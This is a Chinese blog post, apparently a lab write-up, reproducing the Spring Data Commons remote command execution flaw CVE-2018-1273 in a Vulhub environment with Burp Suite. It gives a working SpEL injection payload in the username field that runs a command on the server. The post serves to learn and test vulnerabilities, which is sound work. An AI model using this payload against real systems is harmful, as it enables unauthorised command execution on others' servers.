CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现

CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现


前期准备

工具:burpsuite、firefox浏览器
环境:kali

一、漏洞复现

(1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users,在注册页面提交任意信息,用burp抓包;
在这里插入图片描述
找到我们提交的数据,之后发送到repeater进行修改数据包;
在这里插入图片描述
构造payload,username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=,修改数据包,创建文件,进行发包测试;

在这里插入图片描述
Send之后,返回以下页面时,证实攻击成功;
在这里插入图片描述
进入容器查看文件夹是否创建成功(文件创建成功~):进入Ubuntu环境中,执行docker-compose exec spring bash,进入目录,查看tmp下的目录成功出现2333文件,命令执行成功。
在这里插入图片描述
执行 exit 退出当前用户的命令行环境

关闭docker环境,docker-compose down
在这里插入图片描述

二、总结

用火狐浏览器设置代理,用burp抓包时,一直没能连接到burp,之后发现和靶场端口撞了,之后修改的burp的端口,在启动代理时就能抓包了。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值